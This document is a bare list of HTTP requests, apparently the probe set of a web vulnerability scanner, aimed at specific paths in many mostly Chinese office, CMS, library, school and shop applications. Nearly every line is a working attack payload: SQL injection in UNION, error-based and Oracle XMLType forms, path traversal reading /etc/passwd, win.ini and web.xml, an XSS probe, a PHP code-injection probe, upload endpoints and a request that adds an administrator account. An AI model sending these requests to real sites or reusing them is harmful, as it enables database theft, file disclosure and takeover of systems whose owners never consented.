GET /lm/front/noontimelist.jsp?flag=a&start=1&end=2&sysid=2'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL%20FROM%20DUAL%20--&groupid=4
POST /php/bill/print_addfeelog.php
GET /objectbox/selectx_userlist.jsp?fn_Keywords=1'%20UNION%20ALL%20SELECT%20NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL--%20&perm=&cPage=1&tiao=
GET /meetingroom/ShenQingInforDis.asp?OAID=-12%20AND%201993%20IN%20(char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100))%20---
GET /information/oa_infordislist.asp?class=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
GET /information/OA_Condition.asp?class=1&subclass=(CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))))---
GET /message/mytreedata.asp?bumenid=-12%20AND%201432=CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)))--%20&time=&time=
POST /house/upload/upload.asp
POST /sbweb/Upload_Save_2.asp
GET /feReport/chartList.jsp?delId=1&reportId=1%20and%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--
GET /jsearch/admin/opr_forcechangepwd.jsp
GET /home/front/search/opr_chatsearch.jsp?action=simplesearch&words=1%25%27%20union%20all%20select%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20DUAL%20--
POST /celive/live/index.php?action=1
GET /admin/Site/AddDomain.aspx?Edit=1&id=1000/**/%20/**/union/**/%20/**/all/**/%20/**//**/SELECT/**/%200,/**/CHAR(106)%2bCHAR(106)%2bCHAR(106),0,0,'',0,2014,0/**/FROM/**/%20ZL_Manager
GET /baseNews_view.jsp?newsId=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--
POST /Lesktop/command.aspx
GET /Lesktop/Management/DeptEdit.aspx?did=1%20and%20char(106)%3E0
POST /Lesktop/sendfile.aspx
GET /Office_Supplies/Goods_Main.aspx?type=1&info_id=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /Personnel/Infomation.aspx?userid=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /Personnel/VacationComputation.aspx?id=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /RCMANAGE_New/rcgl.aspx?UID=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /ObjSwitch/HYTZ.aspx?userid=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /modules/pdflist.aspx?info_id=1/**/union/**/all/**/select/**/null,null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),null,null,null/**/from/**/dual%20--
GET /jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1%20union%20all%20select%2012,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20from%20dual%20--
GET /lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,md5(1122),0x7e),NULL,NULL,NULL,NULL
GET /lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL%23
GET /jcms/jcms_files/jcms1/web2/site/module/comment/opr_readfile.jsp?filename=opr_readfile.jsp
GET /managerNManager.action
GET /lm/manage/opr_setappraisal.jsp?fn_billstatus=E&vc_setapprid=-2087%20UNION%20ALL%20SELECT%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL%20FROM%20DUAL--
GET /jcms/m_1_9/column/getgroupuser.jsp?jgid=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)%20--&spell=2&webid=3&userid=4
GET /lm/sys/opr_bulletin_show.jsp?vc_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
GET /lm/front/mailpublist.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
GET /jcms/workflow/design/opr_model_class.jsp?fn_billstatus=E&vc_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100),NULL,NULL,NULL%20--
GET /jcms/m_5_5/m_5_5_1/objectbox/selectx_search.jsp?spell=1%25%27%20union%20all%20select%20null%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%20from%20dual%20--
GET /lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL%20--
GET /lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,0x7765627363616E3A693A66696E64,0x7e)%23
GET /lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
GET /admini/question/question.aspx?ID=25'%20and%20char(106)%2bchar(106)%3E0%20--
GET /ModifyNewsAction.do?newsID=-12
GET /plugins/qmail/MailTo.aspx?mail=1%27and%02CHAR(106)%2bCHAR(39)%3E0%02and%02%271%27=%271
POST /manage/Template/DSManage.aspx
GET /index.php?id=product&c=project&cate=1&ext[id%3C0%20union%20select%20111,2,3,4,5,6,md5(1122),8,9%20,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--]=1
GET /api.php?id=_arclist&c=api&f=phpok&param[pid]=41&param[notin]=41)%20Union%20Select%201,md5(1122),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20
GET /admin/admin_adminmodifypwd.aspx
GET /jcms/m_5_6/ajax_printcol.jsp?cataid=1)%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)%20--
GET /feform/createprinttemplete.jsp?formid=1'%20AND%204321=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
GET /fenc/syncsubject.jsp?pk_corp=1'%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
GET /indexsearch/filter.jsp?tableId=1%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
GET /Modules/jycg/SFDB.aspx?sfpjnm=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116),NULL%20--&type=1
GET /print/search_print_proof.jsp?proof_no=just_sql_test'
POST /include/user/mulbumentree.asp
POST /include/user/usertree.asp
GET /include/zidian/dantree.asp?ZiDian='%20AND%204321%3DCONVERT%28INT%2C%28SELECT%20CHAR%28106%29%2bCHAR%28117%29%2bCHAR%28115%29%2bCHAR%28116%29%2bCHAR%2895%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%28115%29%2bCHAR%28116%29%29%29%20--
POST /public/oa_nodebanliren_frm.asp
POST /include/chaxundetail.asp
POST /include/user/bdtreemx.asp
POST /admin/Fileup.aspx?path=notice/upload
GET /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20UNION%20SELECT%201,2,3,md5%281122%29,5,6,7,8,9%23
GET /inc/guestbook.php?do=guestbook&t=ajax&mid=1&content=testtesta%E9%8C%A6%27,(select%20concat%280x7c,md5%281122%29,0x7c%29from%20job_admin%20limit%201%29,NOW%28%29,1,1,3,1,if%281=2,1,char%28@%60%27%60%29%29%29%23@%60%27%60
POST /index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
GET /hlp/help.asp?HlpCode=1'%20and%201=char(106)%20--
GET /Code/Common/SysCommonAttach.aspx?Method=GetNewID&IDs=isTrans&tabRecordId=1%27%20AND%201%3DCHAR%28106%29%20--
GET /ModifyNewsAction.do?newsID=-12'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%20%23
GET /piw/Site/KeyWordExport.jsp?ids=-111)%20union%20select%20Username,md5%281122%29,222,4444,5555%20from%20zduser%23
GET /schedule/Entrust.aspx?nidlist=0,1)/**/and/**/1=CHAR(106)%20--
POST /common/mod/ajax.ashx
GET /SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=-1'%20and%201=char(106)%20--
POST /dakai.aspx
GET /SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=3'%20and%201=char(106)%20--
GET /Permission/Application_Query_List.aspx?deptName=3'%20and%201=char(106)%20--
GET /main/model/childcatalog/zxzxinfo.jsp?MailId=13%20UNION%20ALL%20SELECT%20NULL,CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29,NULL,NULL,NULL,NULL,NULL,NULL%20--
GET /index_page/geren_list_page.aspx?server=1&refid=1'%20AND%201=CHAR(106)%2bCHAR(60)%20--
GET /website/level3.jsp?tablename=7&infoid=-1'%20UNION%20ALL%20SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29--
GET /varset/modifyTime.asp?varname=&id=495'%20union%20all%20select%201,2,3,0x66696E643A76756C,5,6,7,8,9%20from%20teachers%20--
POST /getpassword.php?do=login
GET /api/uc/uc.php?code=380dDbp0QmFDGmUR2ENTw7v%2B1YVER%2BKFyWB3YQN0OARXAr%2BIV4p1g3Ou5yA2CG6k%2BYdUOSb%2BwsiMwU4aqz2Gmtae60ut%2Fw
GET /servlet/FileDownload?filepath=c:/windows/win.ini&dispname=42873.txt
GET /servlet/FileDownload?filepath=/etc/passwd&dispname=42873.txt
POST /index.php?m=register&c=ajax_reg
GET /api/uc.php?code=8e347f1oWfxZ5isPSs7QBbA78aaJwxZCvdIIfY2niRLsrqrg0dHBfrkRSaOtzGxkncaWtRGPVKjVbHwZJSlI1JFH9WBN5wj%2Fsqj2Xg
GET /witapprovemanage/apprvaddNew.jsp?flowid=%27%20and%201=2%20UNION%20SELECT%201,2,3,4,char(106)%2bchar(60),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29;--%20-
GET /nicknamelogin.jsp
GET /jsearch/viewsnap.jsp?snapname=/../../../../../../../../../../../../../etc/passwd
GET /lm/objectbox/selectx_groupuserlist.jsp?vc_parid=-42873%27+or+%271%27=%271
POST /index.php?m=register&c=ajax_reg
GET /inc/ajax.asp?action=videoscore&id=1%20and%201=2%20union%20select%20CHR(106),CHR(99),3%20from%20%7Bpre%7Dmanager
GET /ajaxfs.php?tooltip=5254'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%20%23
GET /utilities.php?tail_lines=50&message_type=-1&go.x=10&go.y=9&refresh=20&reverse=1&filter=%22%3E%25%3Cscript%3Eprompt(42873)%3C/script%3E&page=1&action=view_logfile
POST /?q=node&destination=node
GET /UtilServlet?name=-1'%20UNION%20ALL%20SELECT%20NULL,%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)--%20&operation=getUserInfo&time=12
POST /jcms/m_5_e/module/individuation/opr_individuation_unit.jsp?fn_billstatus=B&sub_row=just_test
HEAD /govdiropen/jcms_files/jcms1/web1/site/zfxxgk/download/downannals.jsp?name=..././..././..././..././..././..././WEB-INF/ini/merpserver.ini&webid=1&type=1&downname=just_test.txt
GET /down.aspx?id=(select%20convert(int,(select%20char(106)))%20FROM%20syscolumns)
POST /api/CheckMemberLogin.ashx?type=mobileisexist
GET /comm/showpic.php?pic=aHR0cDovL3d3dy5zby5jb20vcm9ib3RzLnR4dA%3D%3D
POST /LoginCheck.aspx
GET /NodeProdCategory.aspx?action=GetChildNode&CategoryId=(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))
GET /index.php?c=api&m=data&auth=finecms&param=action%3Dcache%20name%3DSPACE-MODEL.1%27%5D%3Bprint%28md5%281122%29%29%3B%2f%2f
GET /Book/user_read.jsp?classId=1'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20and%20'at'='at
GET /show.jsp?id=5'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20AND%20'AT'='AT
GET /NTRdrS_RegistInfo.aspx?BookRecno=1'%20AND%209211=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'AT'='AT
GET /NTRdrBookRetrInfo.aspx?BookRecno='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20chr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(58)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%20from%20DUAL))%7C%7C'
GET /NTRdrBookRetrInfo.aspx?BookRecno=18273&NewBIBNO=111%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)&NEWBOOK=newbook
GET /NTBookRetrTopShowright.aspx?page=1&Index=6&LocLmt=&SrchTab=3&Acurate=3&Key='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%20from%20DUAL))%7C%7C'&AllName=A++
GET /zfcgFrame/xx_look.aspx?ID=-1%27%20UNION%20ALL%20SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29--%20
GET /AdminP
GET /lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23
HEAD /public/download.asp?filename=../login2.asp/
GET /Isv.ashx?action=addadmin&adminuser=admin&adminpassword=111111&guid=1
GET /index.php?controller=block&action=goodsCommend&id=0)%20Union%20select%201,md5(1122)%23
POST /API/DownloadProducts.ashx
GET /Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts%20Desc)%20AS%20RowNumber%20FROM%20vw_Hishop_BrowseProductList%20p%20WHERE%20SaleStatus%20=%201)%20T%20WHERE%201=1%20and%201=char(106)%20--
GET /ProductUnSales.aspx?keywords=uio%2527&tagIds=1_2))%20T%20WHERE%201=1%20and%201=(select%20char(106)%2bchar(106))%20--%20&pageIndex=1
GET /SubCategory.aspx?TagIds=1%20and%20char(106)%3E1
POST /MShop/Partial/SuppLogo
POST /ShoppingHandler.aspx
HEAD /bq/Data/BIData.zip
GET /jphoto/objectbox/selectx_search.jsp?spell=1%25%27%20UNION%20SELECT%20CHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2899%29%7C%7CCHR%2899%29%2Cnull%20FROM%20DUAL%20--
HEAD /vc/vc/columncount/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
GET /jact/workflow/design/index.jsp?flowcode=a'%20UNION%20ALL%20SELECT%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(107)%7C%7CCHR(109)%7C%7CCHR(108),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
GET /jis/manage/role/opr_approleinfo_user2.jsp?c_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(101)%2bCHAR(102)%2bCHAR(58)%2bCHAR(104)%2bCHAR(103)%2bCHAR(58)%2bCHAR(105),NULL,NULL--%20
POST /cms/voteManager/voteaction.jsp
GET /EditPhotoHandle.aspx?Action=EditCover&PhotoId=(SELECT%20CHAR(106)%2bCHAR(107))
POST /ShopManage.aspx
GET /RegionHandle.aspx?action=GetChildNode&ParentId=(select%20%20(char(106)%2bchar(100)))
POST /SNS/Product/WaterfallProductListData
POST /ProSales/GetListCate
HEAD /jphoto/jphoto/sys/member/opr_export.jsp
POST /JwGl/jxjh/JxjhXGBc.asp
GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500-52-25-1.html
HEAD /defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../index.jsp
GET /defaultroot/public/select_user/search_org_list.jsp?searchName=a%27%20UNION%20ALL%20SELECT%20CONCAT%280x23%2C0x7765627363616E3A693A66696E64%2C0x23%29%2CNULL%23
GET /defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(108)%2bCHAR(109)%2bCHAR(110),NULL,NULL,NULL,NULL,NULL,NULL--
GET /cjcx/xuesheng/czjl/shuru.asp?id=-28%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(100)%2bCHAR(100)%2bCHAR(60)%20--&xueke=
GET /cjcx/bkxt/yqts1.asp?newsid=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
GET /cjcx/bkxt/xxpj.asp?id=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
GET /cjcx/kagx/main3.asp?rjxk=dd'%20and%201=(CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))%20--&xqmc=%25&jsxm=&mc=&ktlx=&page=
POST /login.asp
POST /search.php
GET /LoginCheck4.asp?LoginLb=jwc&Account=1'%20AND%201=CHAR(106)%20--&PassWord=0
GET /jwgl/jxjh/jxjha.asp
POST /jwgl/jcxx/savetofile.asp
POST /public/jsp/livephotoupload.jsp?path=archives&mode=add&hiddenName=1.jsp&visualName=2.jsp
GET /Help.aspx?id=(SELECT%20CHAR(106)%2bCHAR(103)%2bCHAR(105)%2bCHAR(100))
POST /govezoffice/gov_documentmanager/senddocument_import.jsp?categoryId=1&path=archives&mode=add&fileName=1.jsp&saveName=2.jsp&fileMaxSize=0&fileMaxNum=100&fileType=jsp
GET /edoas2/edoas2_test.jsp
GET /Report/AjaxHandle/StationChoose/StationTree.ashx?STTP='KKK')%20AND%201587=CONVERT(INT,(CHAR(58)%2bCHAR(117)))%20--&RadioType=Radio_XZ&ReportID=Report22
POST /celive/live/header.php
GET /SystemManage/AjaxHandle/AjaxVertifyUserID.ashx?uid=1'%20AND%201=CHAR(106)%20--
HEAD /skywcm/webpage/download.jsp?absolutePath=C:%5Cwindows%5Cwin.ini&downFileName=win.ini
GET /RdrRInforDetail.aspx?page=1&Index=4&KeyWord=AA'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&name=r_infor&AcqSys=CN
GET /m/info/top_rating.action?clsNo=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'at'='at
GET /BaseCourse/RushTeamCollect.aspx?adcd=1&key=1%25'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
GET /Plan/FloodPlan/FileEdit.aspx?id=1'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
